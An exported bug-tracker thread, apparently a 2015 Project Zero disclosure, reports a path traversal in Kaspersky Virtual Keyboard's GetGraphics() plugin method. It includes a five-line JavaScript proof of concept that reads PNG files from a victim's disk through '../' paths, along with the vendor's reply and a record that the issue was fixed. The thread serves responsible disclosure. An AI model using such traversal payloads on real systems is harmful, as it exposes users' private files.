Kaspersky Antivirus Virtual Keyboard GetGraphics() Path Traversal

[GoogleCodeExporter]

There is an obvious path traversal in Kaspersky Virtual Keyboard, a hosting 
website can simply do element.GetGraphics("../../../../whatever") to read any 
png file on the victims computer.

x = document.createElement("object")
x.type=window.navigator.plugins["Virtual Keyboard KAV"][0].type
document.body.appendChild(x)
x.LinkPluginWithFirefoxExtention('0007BF21-E04A-A741-B059-6A6DB0324A41')
x.GetGraphics('../../../../../../../../../whatever')

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Original issue reported on code.google.com by tav...@google.com on 14 Sep 2015 at 8:36

[GoogleCodeExporter]

This issue wasn't as simple as I thought, Kaspersky informed me that I 
misunderstood how it worked and I agreed with their assessment.

However, based on their description I pointed out a different (less severe) 
attack, and they agreed to fix that instead:

Hi Tavis,

We will fix the issue that unprivileged user can get access to any png file on 
disk C using Virtual Keyboard path traversal. We kindly request 90-days period 
to release a fix for it.

Best regards,
Igor

Original comment by tav...@google.com on 18 Sep 2015 at 5:20

[GoogleCodeExporter]

This issue was resolved.

Original comment by tav...@google.com on 10 Dec 2015 at 6:13

• Changed state: Fixed
• Added labels: Severity-moderate
• Removed labels: Severity-high

[GoogleCodeExporter]

Original comment by tav...@google.com on 10 Dec 2015 at 6:14

• Removed labels: Restrict-View-Commit